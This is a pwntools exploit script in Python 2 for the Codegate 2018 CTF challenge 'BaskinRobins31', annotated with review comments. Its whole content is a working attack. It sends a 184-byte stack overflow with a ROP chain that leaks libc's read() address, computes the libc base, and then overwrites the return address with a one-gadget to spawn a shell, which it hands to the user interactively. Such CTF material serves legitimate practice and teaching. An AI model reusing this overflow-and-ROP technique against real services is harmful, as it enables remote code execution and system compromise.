# exploit.py
#
# Codegate 2018 CTF "BaskinRobins31" solve script, written for pwntools under
# Python 2 (print statement, str-typed payloads concatenated with p64()).
# It makes two round trips to the target:
#   1. send an over-long answer whose tail is a sequence of fixed 8-byte
#      addresses, then pull an 8-byte value out of the response (a leak);
#   2. send the same padding again, followed by one libc-relative address.
# Every address and offset below is hard-coded for one specific binary and
# one specific libc build; the 0x40xxxx values are consistent with a non-PIE
# x86-64 binary.  NOTE(review): the fixed 184-byte padding followed directly
# by addresses means the script assumes nothing detects the overwrite
# between the input buffer and the first overwritten 8-byte slot (no canary)
# and that the binary's own addresses do not move between runs -- stack
# canaries and PIE are the mitigations that break exactly those assumptions;
# confirm with checksec against the actual binary.
from pwn import *
from time import *
p = process('./BaskinRobins31')
#p = remote('ch41l3ng3s.codegate.kr', 3131)
# Short pause before the first recv -- presumably so the target's banner has
# arrived; nothing here synchronises on the banner content itself.
sleep(0.3)
print p.recv(1024)
# Round 1.  '3' plus 183 filler bytes = 184 bytes before the first p64()
# value; r_payload below uses the same 184, so that is the distance the
# script assumes from the input buffer to the first overwritten 8-byte slot.
payload = str('3') + 'A'*183
# Six little-endian 8-byte values appended after the padding (five here, one
# on the next line).  Their roles are not recoverable from this script alone;
# presumably a small chain that makes the target emit a libc pointer, given
# that the response is parsed for one immediately afterwards -- verify
# against the binary.
payload += p64(0x40087a) + p64(0x1) + p64(0x602040) + p64(0x10) + p64(0x4006d0)
payload += p64(0x4008a4)
p.sendline(payload)  # sendline appends '\n' to the payload
# Single 1024-byte recv.  NOTE(review): there is no length check, so if fewer
# than 245 bytes arrive the slice below is short and u64() fails.
data = p.recv(1024)
# 8 bytes at offset 237 of the response, unpacked as little-endian.  The
# name suggests it is the leaked address of libc's read(); confirm.
read = u64(data[237:245])
# 0xf7250 is treated as read()'s offset within the target libc build, so
# subtracting it yields the libc load base.  Only valid for that one build.
libc = read - 0xf7250
# 0x45216 is another offset in the same libc build; the result is the only
# return target placed in the second payload.
oneshot = libc + 0x45216
log.info('read = ' + hex(read))
log.info('libc = ' + hex(libc))
log.info('oneshot = ' + hex(oneshot))
# Round 2.  Same 184-byte padding as round 1 (there is no leading '3' this
# time), then the single libc-relative address computed above.
r_payload = 'A'*184
r_payload += p64(oneshot)
p.sendline(r_payload)
# Hand the connection over to the user.
p.interactive()